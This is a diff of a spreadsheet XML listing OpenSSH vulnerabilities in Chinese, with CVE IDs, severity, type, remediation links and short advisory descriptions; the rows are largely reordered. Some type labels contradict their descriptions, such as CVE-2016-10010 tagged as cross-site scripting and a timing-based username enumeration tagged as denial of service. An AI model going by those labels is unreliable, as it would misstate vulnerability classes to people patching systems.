-          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 6.9之前版本的ssh中的channels.c文件中的‘x11_open_helper’函数存在安全漏洞，该漏洞源于程序禁用ForwardX11Trusted模式时，没有检查X连接的refusal deadline。远程攻击者可借助特制的连接利用该漏洞绕过既定的访问限制。</t>
+          <t>基于non-OpenBSD平台的OpenSSH 7.0之前版本的sshd中的monitor.c文件中的‘mm_answer_pam_free_ctx’函数存在释放后重用漏洞。本地攻击者可通过控制sshd uid发送错误的MONITOR_REQ_PAM_FREE_CTX请求利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G26" t="inlineStr">
@@ -3362,7 +3372,7 @@
       </c>
       <c r="J26" t="inlineStr">
         <is>
-          <t>CVE-2015-5352</t>
+          <t>CVE-2015-6564</t>
         </is>
       </c>
       <c r="K26" t="inlineStr">
@@ -3432,7 +3442,7 @@
     <row r="27">
       <c r="A27" t="inlineStr">
         <is>
-          <t>OpenSSH 访问限制绕过漏洞(CVE-2018-20685)</t>
+          <t>OpenSSH身份验证绕过漏洞(CVE-2023-51767)</t>
         </is>
       </c>
       <c r="B27" t="inlineStr">
@@ -3442,22 +3452,22 @@
       </c>
       <c r="C27" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D27" t="inlineStr">
         <is>
-          <t>越权访问</t>
+          <t>绕过认证</t>
         </is>
       </c>
       <c r="E27" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
+          <t>官方已发布新版本修复该漏洞，请根据具体发行版将openssh更新到最新版本。</t>
         </is>
       </c>
       <c r="F27" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。scp Client是其中的一个SCP客户端。OpenSSH 7.9版本中的scp客户端的scp.c文件存在安全漏洞。远程攻击者可借助.文件名或空文件名利用该漏洞造成SSH服务器绕过访问限制。</t>
+          <t>从OpenSSH 到 9.6，当使用常见类型的 DRAM 时，可能会允许行锤攻击（用于绕过身份验证），因为 mm_answer_authpassword 中已验证的整数值无法抵抗单个位的翻转。注意：这适用于攻击者-受害者共置的某种威胁模型，其中攻击者拥有用户权限。</t>
         </is>
       </c>
       <c r="G27" t="inlineStr">
@@ -3477,7 +3487,7 @@
       </c>
       <c r="J27" t="inlineStr">
         <is>
-          <t>CVE-2018-20685</t>
+          <t>CVE-2023-51767</t>
         </is>
       </c>
       <c r="K27" t="inlineStr">
@@ -3547,7 +3557,7 @@
     <row r="28">
       <c r="A28" t="inlineStr">
         <is>
-          <t>OpenSSH身份验证绕过漏洞(CVE-2023-51767)</t>
+          <t>OpenSSH 访问限制绕过漏洞(CVE-2018-20685)</t>
         </is>
       </c>
       <c r="B28" t="inlineStr">
@@ -3557,22 +3567,22 @@
       </c>
       <c r="C28" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D28" t="inlineStr">
         <is>
-          <t>绕过认证</t>
+          <t>越权访问</t>
         </is>
       </c>
       <c r="E28" t="inlineStr">
         <is>
-          <t>官方已发布新版本修复该漏洞，请根据具体发行版将openssh更新到最新版本。</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
         </is>
       </c>
       <c r="F28" t="inlineStr">
         <is>
-          <t>从OpenSSH 到 9.6，当使用常见类型的 DRAM 时，可能会允许行锤攻击（用于绕过身份验证），因为 mm_answer_authpassword 中已验证的整数值无法抵抗单个位的翻转。注意：这适用于攻击者-受害者共置的某种威胁模型，其中攻击者拥有用户权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。scp Client是其中的一个SCP客户端。OpenSSH 7.9版本中的scp客户端的scp.c文件存在安全漏洞。远程攻击者可借助.文件名或空文件名利用该漏洞造成SSH服务器绕过访问限制。</t>
         </is>
       </c>
       <c r="G28" t="inlineStr">
@@ -3592,7 +3602,7 @@
       </c>
       <c r="J28" t="inlineStr">
         <is>
-          <t>CVE-2023-51767</t>
+          <t>CVE-2018-20685</t>
         </is>
       </c>
       <c r="K28" t="inlineStr">
@@ -3662,7 +3672,7 @@
     <row r="29">
       <c r="A29" t="inlineStr">
         <is>
-          <t>OpenSSH xauth命令注入漏洞(CVE-2016-3115)</t>
+          <t>OpenSSH x11_open_helper()函数安全限制绕过漏洞(CVE-2015-5352)</t>
         </is>
       </c>
       <c r="B29" t="inlineStr">
@@ -3677,18 +3687,18 @@
       </c>
       <c r="D29" t="inlineStr">
         <is>
-          <t>命令执行</t>
+          <t>防御绕过</t>
         </is>
       </c>
       <c r="E29" t="inlineStr">
         <is>
           <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://www.openssh.com/txt/x11fwd.adv</t>
+http://www.openssh.com/txt/release-6.9</t>
         </is>
       </c>
       <c r="F29" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.2p1及之前版本的sshd中的session.c文件中存在CRLF注入漏洞。远程攻击者可借助特制的X11转发数据利用该漏洞绕过既定的shell-command限制。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 6.9之前版本的ssh中的channels.c文件中的‘x11_open_helper’函数存在安全漏洞，该漏洞源于程序禁用ForwardX11Trusted模式时，没有检查X连接的refusal deadline。远程攻击者可借助特制的连接利用该漏洞绕过既定的访问限制。</t>
         </is>
       </c>
       <c r="G29" t="inlineStr">
@@ -3708,7 +3718,7 @@
       </c>
       <c r="J29" t="inlineStr">
         <is>
-          <t>CVE-2016-3115</t>
+          <t>CVE-2015-5352</t>
         </is>
       </c>
       <c r="K29" t="inlineStr">
@@ -3778,7 +3788,7 @@
     <row r="30">
       <c r="A30" t="inlineStr">
         <is>
-          <t>OpenSSH sshd monitor.c文件权限许可和访问控制漏洞(CVE-2015-6564)</t>
+          <t>OpenSSH 安全漏洞(CVE-2016-0777)</t>
         </is>
       </c>
       <c r="B30" t="inlineStr">
@@ -3793,17 +3803,17 @@
       </c>
       <c r="D30" t="inlineStr">
         <is>
-          <t>访问控制错误</t>
+          <t>信息泄露</t>
         </is>
       </c>
       <c r="E30" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
         </is>
       </c>
       <c r="F30" t="inlineStr">
         <is>
-          <t>基于non-OpenBSD平台的OpenSSH 7.0之前版本的sshd中的monitor.c文件中的‘mm_answer_pam_free_ctx’函数存在释放后重用漏洞。本地攻击者可通过控制sshd uid发送错误的MONITOR_REQ_PAM_FREE_CTX请求利用该漏洞获取权限。</t>
+          <t>远程攻击者可通过请求传输整个缓冲区利用该漏洞获取进程内存中的敏感信息。</t>
         </is>
       </c>
       <c r="G30" t="inlineStr">
@@ -3823,7 +3833,7 @@
       </c>
       <c r="J30" t="inlineStr">
         <is>
-          <t>CVE-2015-6564</t>
+          <t>CVE-2016-0777</t>
         </is>
       </c>
       <c r="K30" t="inlineStr">
@@ -3893,33 +3903,28 @@
     <row r="31">
       <c r="A31" t="inlineStr">
         <is>
-          <t>OpenSSH 授权问题漏洞(CVE-2021-36368)</t>
+          <t>OpenSSH 安全漏洞(CVE-2021-41617)</t>
         </is>
       </c>
       <c r="B31" t="inlineStr">
         <is>
-          <t>建议修复</t>
+          <t>尽快修复</t>
         </is>
       </c>
       <c r="C31" t="inlineStr">
         <is>
-          <t>低危</t>
-        </is>
-      </c>
-      <c r="D31" t="inlineStr">
-        <is>
-          <t>授权问题</t>
-        </is>
-      </c>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D31" t="inlineStr"/>
       <c r="E31" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://www.openssh.com/security.html</t>
+          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：https://www.openssh.com/security.html</t>
         </is>
       </c>
       <c r="F31" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 
-OpenSSH 8.9 之前的版本中存在安全漏洞。该漏洞源于客户端使用带代理转发但没有 -oLogLevel=verbose 的公钥身份验证。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH存在安全漏洞。该漏洞源于允许权限提升，因为补充组未按预期初始化。</t>
         </is>
       </c>
       <c r="G31" t="inlineStr">
@@ -3939,7 +3944,7 @@
       </c>
       <c r="J31" t="inlineStr">
         <is>
-          <t>CVE-2021-36368</t>
+          <t>CVE-2021-41617</t>
         </is>
       </c>
       <c r="K31" t="inlineStr">
@@ -4009,7 +4014,7 @@
     <row r="32">
       <c r="A32" t="inlineStr">
         <is>
-          <t>OpenSSH信息泄露漏洞(CVE-2020-14145)</t>
+          <t>openssh 安全漏洞 (CVE-2023-51384)</t>
         </is>
       </c>
       <c r="B32" t="inlineStr">
@@ -4022,20 +4027,15 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D32" t="inlineStr">
-        <is>
-          <t>信息泄露</t>
-        </is>
-      </c>
+      <c r="D32" t="inlineStr"/>
       <c r="E32" t="inlineStr">
         <is>
-          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：
-https://www.openssh.com/</t>
+          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
         </is>
       </c>
       <c r="F32" t="inlineStr">
         <is>
-          <t>OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 5.7版本至8.4版本的客户端中存在信息泄露漏洞。攻击者可利用该漏洞获取信息。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于当在添加PKCS11托管私钥的过程中指定目标约束时，这些约束仅应用于第一个密钥。</t>
         </is>
       </c>
       <c r="G32" t="inlineStr">
@@ -4055,7 +4055,7 @@
       </c>
       <c r="J32" t="inlineStr">
         <is>
-          <t>CVE-2020-14145</t>
+          <t>CVE-2023-51384</t>
         </is>
       </c>
       <c r="K32" t="inlineStr">
@@ -4125,7 +4125,7 @@
     <row r="33">
       <c r="A33" t="inlineStr">
         <is>
-          <t>OpenSSH 远程权限提升漏洞(CVE-2016-10010)</t>
+          <t>Openssh 安全限制绕过漏洞(CVE-2016-10012)</t>
         </is>
       </c>
       <c r="B33" t="inlineStr">
@@ -4140,17 +4140,17 @@
       </c>
       <c r="D33" t="inlineStr">
         <is>
-          <t>跨站脚本攻击（XSS）</t>
+          <t>代码执行</t>
         </is>
       </c>
       <c r="E33" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.4</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/openbsd/src/commit/3095060f479b86288e31c79ecbc5131a66bcd2f9</t>
         </is>
       </c>
       <c r="F33" t="inlineStr">
         <is>
-          <t>OpenSSH 7.4之前的版本中的sshd存在安全漏洞。本地攻击者可利用该漏洞获取权限。</t>
+          <t>OpenSSH 7.4之前的版本中的sshd的共享内存管理器存在安全漏洞。本地攻击者可通过访问沙箱privilege-separation进程利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G33" t="inlineStr">
@@ -4170,7 +4170,7 @@
       </c>
       <c r="J33" t="inlineStr">
         <is>
-          <t>CVE-2016-10010</t>
+          <t>CVE-2016-10012</t>
         </is>
       </c>
       <c r="K33" t="inlineStr">
@@ -4240,7 +4240,7 @@
     <row r="34">
       <c r="A34" t="inlineStr">
         <is>
-          <t>OpenSSH SSH守护进程安全漏洞(CVE-2016-6210)</t>
+          <t>OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)</t>
         </is>
       </c>
       <c r="B34" t="inlineStr">
@@ -4250,22 +4250,22 @@
       </c>
       <c r="C34" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D34" t="inlineStr">
         <is>
-          <t>拒绝服务</t>
+          <t>权限提升</t>
         </is>
       </c>
       <c r="E34" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.3</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F34" t="inlineStr">
         <is>
-          <t>远程主机上运行的 OpenSSH 版本早于 7.3存在一个缺陷,造成此缺陷的原因是对于无效用户而言,程序针对密码过长的验证请求返回的响应时间比针对有效用户返回的响应时间短。这可能允许远程攻击者发动时序攻击并枚举有效用户名。</t>
+          <t>OpenSSH 7.2p2及之前版本的sshd中的session.c文件中的‘do_setup_env’函数存在安全漏洞。当程序启用UseLogin功能并且PAM被配置成读取用户主目录中的.pam_environment文件时，本地攻击者可借助/bin/login程序的特制的环境变量利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G34" t="inlineStr">
@@ -4285,7 +4285,7 @@
       </c>
       <c r="J34" t="inlineStr">
         <is>
-          <t>CVE-2016-6210</t>
+          <t>CVE-2015-8325</t>
         </is>
       </c>
       <c r="K34" t="inlineStr">
@@ -4466,7 +4466,7 @@
     <row r="36">
       <c r="A36" t="inlineStr">
         <is>
-          <t>OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)</t>
+          <t>OpenSSH SSH守护进程安全漏洞(CVE-2016-6210)</t>
         </is>
       </c>
       <c r="B36" t="inlineStr">
@@ -4476,22 +4476,22 @@
       </c>
       <c r="C36" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D36" t="inlineStr">
         <is>
-          <t>权限提升</t>
+          <t>拒绝服务</t>
         </is>
       </c>
       <c r="E36" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.3</t>
         </is>
       </c>
       <c r="F36" t="inlineStr">
         <is>
-          <t>OpenSSH 7.2p2及之前版本的sshd中的session.c文件中的‘do_setup_env’函数存在安全漏洞。当程序启用UseLogin功能并且PAM被配置成读取用户主目录中的.pam_environment文件时，本地攻击者可借助/bin/login程序的特制的环境变量利用该漏洞获取权限。</t>
+          <t>远程主机上运行的 OpenSSH 版本早于 7.3存在一个缺陷,造成此缺陷的原因是对于无效用户而言,程序针对密码过长的验证请求返回的响应时间比针对有效用户返回的响应时间短。这可能允许远程攻击者发动时序攻击并枚举有效用户名。</t>
         </is>
       </c>
       <c r="G36" t="inlineStr">
@@ -4511,7 +4511,7 @@
       </c>
       <c r="J36" t="inlineStr">
         <is>
-          <t>CVE-2015-8325</t>
+          <t>CVE-2016-6210</t>
         </is>
       </c>
       <c r="K36" t="inlineStr">
@@ -4581,7 +4581,7 @@
     <row r="37">
       <c r="A37" t="inlineStr">
         <is>
-          <t>Openssh 安全限制绕过漏洞(CVE-2016-10012)</t>
+          <t>OpenSSH 远程权限提升漏洞(CVE-2016-10010)</t>
         </is>
       </c>
       <c r="B37" t="inlineStr">
@@ -4596,17 +4596,17 @@
       </c>
       <c r="D37" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>跨站脚本攻击（XSS）</t>
         </is>
       </c>
       <c r="E37" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/openbsd/src/commit/3095060f479b86288e31c79ecbc5131a66bcd2f9</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.4</t>
         </is>
       </c>
       <c r="F37" t="inlineStr">
         <is>
-          <t>OpenSSH 7.4之前的版本中的sshd的共享内存管理器存在安全漏洞。本地攻击者可通过访问沙箱privilege-separation进程利用该漏洞获取权限。</t>
+          <t>OpenSSH 7.4之前的版本中的sshd存在安全漏洞。本地攻击者可利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G37" t="inlineStr">
@@ -4626,7 +4626,7 @@
       </c>
       <c r="J37" t="inlineStr">
         <is>
-          <t>CVE-2016-10012</t>
+          <t>CVE-2016-10010</t>
         </is>
       </c>
       <c r="K37" t="inlineStr">
